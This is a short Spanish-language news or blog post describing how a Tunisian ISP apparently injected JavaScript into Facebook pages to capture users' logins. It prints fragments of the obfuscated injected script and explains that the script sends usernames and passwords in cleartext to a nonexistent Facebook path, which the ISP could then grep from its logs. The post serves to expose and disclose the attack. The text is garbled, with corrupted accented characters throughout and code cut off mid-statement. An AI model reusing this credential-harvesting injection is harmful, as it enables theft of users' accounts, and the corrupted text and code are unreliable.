Exposici├│n: ┬┐C├│mo roba el gobierno tunecino las contrase├▒as? Facebook !

Quizás haya seguido las recientes noticias sobre el gobierno tunecino robando cuentas en Facebook.
Leer m├ís aqu├ş…

Exposici├│n: ┬┐C├│mo roba el gobierno tunecino las contrase├▒as? Facebook ! 1

As├ş es como lo hacen:

Aqu├ş est├í la p├ígina web de Facebook como se ve cuando est├ís conectado en T├║nez https://pastebin.com/WV0C9t0F
Echemos un vistazo a esa parte curiosa de JavaScript.

!--
function h6h(st){var st2="";for(i=0;i>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i

Este c├│digo es inyectado por el propio ISP (proveedor de servicios de Internet) y no aparece en ning├║n otro pa├şs, este c├│digo JS realiza una consulta a https://www.facebook.com/wo0dh3ad?q=blablablabla&u=USERNAME&p=PASSWORD con el nombre de usuario y contrase├▒a en claro, la p├ígina “wo0dh3ad”, por supuesto, no existe en el servidor de Facebook, pero el ISP podr├şa simplemente hacer un “grep wo0dh3ad /var/log/FAI.log” para obtener todas las contrase├▒as de sus suscriptores en claro.

Publicaci├│n original de @ r00tBSD: https://www.r00ted.com/doku.php?id=injection_tunisie

Fuente de noticias: Jerry Hassan